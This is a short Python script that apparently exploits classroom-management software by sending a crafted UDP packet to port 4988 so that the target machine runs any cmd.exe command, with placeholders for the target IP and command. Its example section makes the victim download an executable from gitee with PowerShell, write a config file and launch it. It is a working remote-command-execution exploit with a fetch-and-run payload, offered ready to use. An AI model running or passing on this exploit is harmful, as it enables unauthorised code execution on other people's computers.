# (c)2026 Goldfish Inc.

import socket
from os import urandom
from struct import pack

store1 = [
    0x44, 0x4d, 0x4f, 0x43, 0x00, 0x00, 0x01, 0x00,
    0x6e, 0x03, 0x00, 0x00]
store2 = [
    0x20, 0x4e, 0x00, 0x00, 0xc0, 0xa8, 0x6e, 0x80,
    0x61, 0x03, 0x00, 0x00, 0x61, 0x03, 0x00, 0x00,
    0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x0f, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x3c, 0x00, 0x57, 0x00, 0x49, 0x00, 0x4e, 0x00,
    0x53, 0x00, 0x59, 0x00, 0x53, 0x00, 0x44, 0x00,
    0x49, 0x00, 0x52, 0x00, 0x3e, 0x00, 0x5c, 0x00,
    0x63, 0x00, 0x6d, 0x00, 0x64, 0x00, 0x2e, 0x00,
    0x65, 0x00, 0x78, 0x00, 0x65]

def send_cmd(ip_addr: str, port: int, cmd_cmd: str) -> bool:
    cmd_cmd = "/s /c \"" + cmd_cmd + "\""
    arr = [0] * 809
    arr[799] = 0x01
    idx = 475
    for ch in cmd_cmd:
        tmp = ''.join(hex(ord(ch)))
        if int(tmp, 16) > 0xff:
            tmp = tmp[2:]
            high = int((tmp[0] + tmp[1]), 16)
        else:
            high = 0
        low = int((tmp[2] + tmp[3]), 16)
        arr[idx] = low
        arr[idx + 1] = high
        idx += 2
    result = store1 + list(urandom(16)) + store2 + arr
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    payload = pack("%dB" % len(result), *result)
    client.sendto(payload, (ip_addr, port))
    return True

send_cmd("IP地址", 4988, "命令")

# 接下来是示例（自动下载并运行JiYuTrainer），可以删掉
from time import sleep
send_cmd("IP地址", 4988, "start \"\"/min powershell curl -Uri gitee.com/wds824/JiYuTrainer/releases/download/1.7.6/JiYuTrainer.exe -UseBasicParsing -OutFile %USERPROFILE%\\Downloads\\T.exe")
send_cmd("IP地址", 4988, "(echo [JTArgeement]&echo Argeed=TRUE)>%USERPROFILE%\\Downloads\\T.ini")
print("Wait for 15 seconds...")
sleep(15)
send_cmd("IP地址", 4988, "start %USERPROFILE%\\Downloads\\T.exe")